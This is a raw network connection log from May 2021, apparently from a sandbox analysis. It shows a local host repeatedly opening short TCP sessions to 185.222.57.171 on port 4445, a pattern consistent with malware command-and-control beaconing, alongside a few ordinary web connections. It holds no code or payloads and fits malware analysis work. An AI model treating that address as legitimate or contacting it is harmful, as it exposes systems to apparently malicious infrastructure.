May 11, 2021 19:41:00.917535067 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.979208946 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.390479088 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.463606119 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.463690996 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.526036978 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.526281118 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.588505983 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.620894909 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.697979927 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.698066950 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.760397911 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.806076050 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.869843006 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.869945049 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:01.917848110 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:01.971503973 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.018071890 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.025489092 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.088567019 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.088762999 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.135680914 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.138348103 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.185143948 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.219414949 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.291721106 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.504059076 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:02.572958946 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:02.599518061 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:06.855279922 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:06.901962042 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:06.902137995 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.017276049 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.074630022 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.074767113 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.151070118 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.151177883 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.199940920 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.202436924 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.276070118 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.276217937 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.338676929 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.368886948 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.370996952 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.415503979 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.415642977 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.479218960 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.479362011 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.526376009 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.526470900 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.574399948 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.665374994 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.857373953 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:07.947981119 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:07.948124886 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.026139975 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.026289940 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.104403973 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.104515076 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.182305098 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.243843079 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.322899103 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.322958946 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.416778088 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.431993961 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.526037931 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.526359081 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.604284048 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.681710958 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.776036978 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.776113987 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:08.854214907 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:08.948189020 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:09.010942936 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:09.026134014 CEST	4445	49722	185.222.57.171	192.168.2.5
May 11, 2021 19:41:09.027842999 CEST	49722	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.026386976 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.073060036 CEST	4445	49723	185.222.57.171	192.168.2.5
May 11, 2021 19:41:13.073522091 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.074121952 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.130237103 CEST	4445	49723	185.222.57.171	192.168.2.5
May 11, 2021 19:41:13.130537033 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.177215099 CEST	4445	49723	185.222.57.171	192.168.2.5
May 11, 2021 19:41:13.177552938 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.224489927 CEST	4445	49723	185.222.57.171	192.168.2.5
May 11, 2021 19:41:13.227303028 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.291707039 CEST	4445	49723	185.222.57.171	192.168.2.5
May 11, 2021 19:41:13.293337107 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:13.306808949 CEST	49723	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:16.746117115 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.746165991 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.759617090 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.759670973 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.792975903 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.806596041 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.806621075 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.835253954 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947700977 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947737932 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947765112 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947802067 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.947819948 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947849035 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947865963 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.947897911 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947937965 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.947940111 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.947972059 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.948000908 CEST	443	49677	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.948016882 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.962388039 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962423086 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962450981 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962476969 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962491989 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.962503910 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962517977 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.962532043 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962559938 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962585926 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962587118 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:16.962614059 CEST	443	49678	20.190.160.3	192.168.2.5
May 11, 2021 19:41:16.962635040 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:17.009929895 CEST	49677	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:17.010373116 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:41:17.329097986 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.375777006 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.375942945 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.376492977 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.435267925 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.435375929 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.510359049 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.510462046 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.557755947 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.557857037 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.619901896 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.619991064 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.697901964 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.729099035 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.810255051 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.810374975 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.811058044 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.858221054 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.858315945 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.917643070 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.917717934 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:17.966046095 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:17.966151953 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.012855053 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.012979984 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.088613033 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.135565996 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.198003054 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.276082039 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.338613033 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.372123003 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.452667952 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.526062012 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.591213942 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.591300011 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.669209957 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.729285955 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.810591936 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.811861038 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:18.885576010 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:18.947873116 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:19.010577917 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:19.010694981 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:19.088617086 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:19.138376951 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:19.197937012 CEST	4445	49724	185.222.57.171	192.168.2.5
May 11, 2021 19:41:19.276192904 CEST	49724	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.366139889 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.414992094 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.415684938 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.416228056 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.479878902 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.482410908 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.483009100 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.529812098 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.529907942 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.604250908 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.604383945 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.668716908 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.672136068 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.744837046 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.744920969 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.777051926 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.791749001 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:23.791876078 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:23.870035887 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.241343975 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.307405949 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.307533026 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.354645967 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.403734922 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.450417042 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.450592041 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.526078939 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.546402931 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.619730949 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.732011080 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.807408094 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.808732033 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.869921923 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:24.914797068 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:24.979248047 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:25.550335884 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:25.619843960 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:25.703280926 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:25.776156902 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:25.855293036 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:25.916733027 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:25.933226109 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:26.010492086 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:26.026820898 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:26.088653088 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:26.183121920 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:26.260536909 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:26.260880947 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:26.338660955 CEST	4445	49727	185.222.57.171	192.168.2.5
May 11, 2021 19:41:26.401932955 CEST	49727	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.419249058 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.465857983 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.466011047 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.481427908 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.538671017 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.538937092 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.587742090 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.589195013 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.667131901 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.667201996 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.731014967 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.731101990 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.761754036 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.807389975 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.807496071 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.854149103 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.855582952 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.916852951 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.916954041 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:30.963890076 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:30.964042902 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.010510921 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.010631084 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.088572979 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.088640928 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.151106119 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.183427095 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.260493994 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.265444040 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.338673115 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.386570930 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.448100090 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.464559078 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.526055098 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.589597940 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.666635036 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.730364084 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.808068991 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.808233023 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:31.869854927 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:31.949148893 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:32.026120901 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:32.027081013 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:32.088645935 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:32.183576107 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:32.260473967 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:32.261038065 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:32.338659048 CEST	4445	49728	185.222.57.171	192.168.2.5
May 11, 2021 19:41:32.402173996 CEST	49728	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:35.371505022 CEST	49689	80	192.168.2.5	84.53.167.113
May 11, 2021 19:41:35.412534952 CEST	80	49689	84.53.167.113	192.168.2.5
May 11, 2021 19:41:35.412602901 CEST	49689	80	192.168.2.5	84.53.167.113
May 11, 2021 19:41:35.468842030 CEST	80	49683	93.184.220.29	192.168.2.5
May 11, 2021 19:41:35.469060898 CEST	49683	80	192.168.2.5	93.184.220.29
May 11, 2021 19:41:35.610939026 CEST	80	49682	93.184.220.29	192.168.2.5
May 11, 2021 19:41:35.611042023 CEST	49682	80	192.168.2.5	93.184.220.29
May 11, 2021 19:41:36.445772886 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.457762003 CEST	80	49684	93.184.220.29	192.168.2.5
May 11, 2021 19:41:36.458580971 CEST	49684	80	192.168.2.5	93.184.220.29
May 11, 2021 19:41:36.494110107 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.494208097 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.494818926 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.552167892 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.552608013 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.599596024 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.599961042 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.682305098 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.698987961 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.776017904 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.776127100 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.838459969 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.840097904 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:36.916697979 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.965060949 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:36.969573021 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.016170979 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.016514063 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.088501930 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.089109898 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.136023045 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.136153936 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.182805061 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.182912111 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.260656118 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.260740995 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.338592052 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.356192112 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.416654110 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.418368101 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.494785070 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.511974096 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.588762999 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.637957096 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.697894096 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.777652979 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.838623047 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:37.871459007 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:37.947949886 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:38.027647018 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:38.088840008 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:38.100150108 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:38.184067965 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:38.247000933 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:38.307295084 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:38.385634899 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:38.449556112 CEST	4445	49732	185.222.57.171	192.168.2.5
May 11, 2021 19:41:38.485692024 CEST	49732	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:39.740222931 CEST	49699	443	192.168.2.5	131.253.33.200
May 11, 2021 19:41:39.741314888 CEST	49700	443	192.168.2.5	131.253.33.200
May 11, 2021 19:41:39.749624014 CEST	49701	80	192.168.2.5	93.184.220.29
May 11, 2021 19:41:42.902501106 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:42.949131966 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:42.949224949 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:42.950340986 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.009071112 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.009243965 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.088561058 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.088787079 CEST	49733	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:43.135749102 CEST	4445	49733	185.222.57.171	192.168.2.5
May 11, 2021 19:41:43.160418987 CEST	49733	4445	192.168.2.5	185.222.57.171
